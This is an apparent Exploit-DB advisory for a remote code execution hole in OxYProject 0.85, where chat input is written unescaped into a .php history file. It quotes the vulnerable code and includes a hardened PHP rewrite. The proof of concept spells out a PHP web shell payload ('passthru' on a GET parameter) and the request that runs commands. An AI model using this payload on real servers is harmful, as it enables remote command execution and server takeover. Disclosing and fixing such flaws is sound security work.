OxYProject 0.85 - 'edithistory.php' Remote Code Execution

EDB-ID: 5524
Author: GoLd_M
Type: webapps
Platform: PHP
Date: 2008-04-30


OxYProject 0.85 (edithistory.php) Remote Code Execution Vulnerability
Script : http://puzzle.dl.sourceforge.net/sourceforge/oxyproject/OxYBox085uns.zip
Vulnerable code (edithistory.php):
###################Ln 24###################
include('oxycfg.php');

//########################################
//	Editing the Chat History
//########################################

$edit_file = $file['Chat_History'];
$fh = fopen($edit_file, 'a') or die("<meta http-equiv=\"refresh\" content=\"1 ;url=oxybox_submit.php\"><font face=\"arial\">Error occured when submitting your message. <a href=\"javascript: history.go(-1)\">Back</a></font>");
fwrite($fh, "<b><font face=\"arial\" color=" . $_POST["usercolor"] . ">" . $_POST["oxyname"] . " :</font></b> <font color=" . $_POST["msgcolor"] . ">" . $_POST["oxymsg"] . "</font><br>");
fclose($fh);
###################Ln 33###################
In the file "oxycfg.php":
###################Ln 33###################
$file['Chat_History'] = "oxyhistory.php";
###################Ln 23###################
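
The four POST fields are appended unescaped to a file with a .php extension, so anything written into the chat is later parsed by the PHP interpreter when oxyhistory.php is requested. The following is an added example of a hardened write, not code from OxYProject or from the advisory author; the file name oxyhistory.html and the helper names safe_color, esc, build_history_line and append_history are assumptions made for illustration.

```php
<?php
// Added example, not OxYProject code. Assumed: the history file is renamed to
// "oxyhistory.html" (hypothetical name) so the server never runs it as PHP.
const HISTORY_FILE = 'oxyhistory.html';

// Allow only a plain color name or #rrggbb; anything else becomes $default.
function safe_color($value, $default = 'black')
{
    $value = is_string($value) ? $value : '';
    $ok = preg_match('/\A(?:[a-zA-Z]{1,20}|#[0-9a-fA-F]{6})\z/', $value) === 1;
    return $ok ? $value : $default;
}

// HTML-escape a field; "<" becomes "&lt;", so no PHP open tag survives.
function esc($value)
{
    $value = is_string($value) ? $value : '';
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Build one chat line from the POST fields used by edithistory.php.
function build_history_line(array $post)
{
    $post += ['usercolor' => '', 'oxyname' => '', 'msgcolor' => '', 'oxymsg' => ''];
    return sprintf(
        '<b><font face="arial" color="%s">%s :</font></b> <font color="%s">%s</font><br>' . "\n",
        safe_color($post['usercolor']),
        esc($post['oxyname']),
        safe_color($post['msgcolor']),
        esc($post['oxymsg'])
    );
}

// Append under an exclusive lock; returns false if the write fails.
function append_history(array $post, $path = HISTORY_FILE)
{
    $line = build_history_line($post);
    return file_put_contents($path, $line, FILE_APPEND | LOCK_EX) !== false;
}

// Constructed sample input (message taken from the PoC on this page).
if (PHP_SAPI === 'cli') {
    echo build_history_line([
        'usercolor' => 'black',
        'oxyname'   => 'Gold_M',
        'msgcolor'  => 'not-a-color',
        'oxymsg'    => '<?php passthru($_GET[cmd]); ?>',
    ]);
}
```

In the request handler the call would be append_history($_POST); escaping and the non-executable extension are independent controls, and either one alone stops the stored message from being executed.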
POC :
Go to: http://localhost/1/OxYBox085uns/0.85/edithistory.php
You will see this on the page:
Username [?]                      Your message has been successfully submitted [X]
              Your Message Here
Username Color [?]  black     Enter Message
In the "Username" field, write "Gold_M"
In the "Your Message Here" field, write this code: "<?php passthru($_GET[cmd]); ?>"
After all this, click "Enter Message"
Now go to: http://localhost/OxYBox085uns/0.85/oxyhistory.php?cmd=dir
# Thanx To TryagOxY

# milw0rm.com [2008-04-30]